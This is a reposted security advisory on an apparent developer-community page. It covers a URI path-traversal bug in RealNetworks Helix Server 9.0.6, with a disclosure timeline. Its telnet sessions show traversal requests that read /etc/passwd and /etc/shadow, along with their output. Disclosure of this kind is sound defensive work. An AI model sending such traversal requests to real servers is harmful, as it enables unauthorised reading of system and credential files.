AI 助理
备案控制台
开发者社区 安全 文章 正文

RealNetworks Helix Server URI Traversal Arbitrary File Access

2010-02-14 774
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: RealNetworks Helix Server URI Traversal Arbitrary File AccessVendor: RealNetworks (http://www. 
RealNetworks Helix Server URI Traversal Arbitrary File Access


Vendor: RealNetworks (http://www.realnetworks.com/)
Product: Helix Server (http://www.realnetworks.com/products/media_delivery.html)
Version: 9.0.6.1262

Exploit details:

$ telnet 1.2.3.4 80
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
OPTIONS / RTSP/1.0

RTSP/1.0 200 OK
CSeq: 0
Date: Sat, 15 Mar 2008 00:28:48 GMT
Server: Helix Server Version 9.0.6.1262 (linux-2.2-libc6-i586-server) (RealServer compatible)
Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN
RealChallenge1: c4x0ft2b97ec020481e88d9defa4f707
StatsMask: 3


Connection closed by foreign host.
$ telnet 1.2.3.4 80
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
GET //./././././../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
[..]
Connection closed by foreign host.
$ telnet 1.2.3.4 80
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
GET //./././././../../../../../etc/shadow
root:HashedPasswdOMG:13885:0:99999:7:::
bin:*:13187:0:99999:7:::
daemon:*:13187:0:99999:7:::
adm:*:13187:0:99999:7:::
lp:*:13187:0:99999:7:::
sync:*:13187:0:99999:7:::
[..]
Connection closed by foreign host.
$

Timeline:

Reported to vendor: 2008-06-16
Vendor ack: 2008-06-16
Vendor solution: Fixed with the release of v.11.x (Nov. 2005) and any v.12 in 2006-Q2


Afterthoughts:

This was discovered during a vulnerability assessment. The client was running outdated
software. The vulnerability was actually discovered by Nessus, one of the web server
related plugins fired, tried a traversal and found this.

Real's response and immediate reply (mail, and then phone call with extensive
discussion) was very well handled. Kudo's to them for taking security seriously.
文章标签:
Shell
安全
cnbird
目录
相关文章
弹性计算-百晓生
|
6天前
|
存储 弹性计算 人工智能
【2025云栖精华内容】 打造持续领先,全球覆盖的澎湃算力底座——通用计算产品发布与行业实践专场回顾
2025年9月24日,阿里云弹性计算团队多位产品、技术专家及服务器团队技术专家共同在【2025云栖大会】现场带来了《通用计算产品发布与行业实践》的专场论坛,本论坛聚焦弹性计算多款通用算力产品发布。同时,ECS云服务器安全能力、资源售卖模式、计算AI助手等用户体验关键环节也宣布升级,让用云更简单、更智能。海尔三翼鸟云服务负责人刘建锋先生作为特邀嘉宾,莅临现场分享了关于阿里云ECS g9i推动AIoT平台的场景落地实践。
弹性计算-百晓生
11099 2
【2025云栖精华内容】 打造持续领先,全球覆盖的澎湃算力底座——通用计算产品发布与行业实践专场回顾
2025「AI安全」全球攻防赛小编
|
5天前
|
云安全 人工智能 自然语言处理
阿里云x硅基流动:AI安全护栏助力构建可信模型生态
阿里云AI安全护栏:大模型的“智能过滤系统”。
2025「AI安全」全球攻防赛小编
1327 29
阿里云云工开物
|
5天前
|
人工智能 自然语言处理 自动驾驶
关于举办首届全国大学生“启真问智”人工智能模型&智能体大赛决赛的通知
关于举办首届全国大学生“启真问智”人工智能模型&智能体大赛决赛的通知
阿里云云工开物
1031 0
2025「AI安全」全球攻防赛小编
|
8天前
|
人工智能 自然语言处理 安全
2025云栖大会之《负责任的AI:AI风险治理与先进安全能力》论坛圆满收官
圆满收官
2025「AI安全」全球攻防赛小编
1168 4
sysin
|
Linux 虚拟化 iOS开发
VMware Workstation Pro 25H2 for Windows & Linux - 领先的免费桌面虚拟化软件
VMware Workstation Pro 25H2 for Windows & Linux - 领先的免费桌面虚拟化软件
sysin
1073 4
JJLIN距离
|
8天前
|
存储 机器学习/深度学习 人工智能
大模型微调技术:LoRA原理与实践
本文深入解析大语言模型微调中的关键技术——低秩自适应(LoRA)。通过分析全参数微调的计算瓶颈,详细阐述LoRA的数学原理、实现机制和优势特点。文章包含完整的PyTorch实现代码、性能对比实验以及实际应用场景,为开发者提供高效微调大模型的实践指南。
JJLIN距离
673 2
modelscope
|
6天前
|
编解码 自然语言处理 文字识别
Qwen3-VL再添丁!4B/8B Dense模型开源,更轻量,仍强大
凌晨,Qwen3-VL系列再添新成员——Dense架构的Qwen3-VL-8B、Qwen3-VL-4B 模型,本地部署友好,并完整保留了Qwen3-VL的全部表现,评测指标表现优秀。
modelscope
495 7
Qwen3-VL再添丁!4B/8B Dense模型开源,更轻量,仍强大
码字猴儿
|
7天前
|
JavaScript API 开发工具
如何在原生App中调用Uniapp的原生功能?
如何在原生App中调用Uniapp的原生功能?
码字猴儿
331 139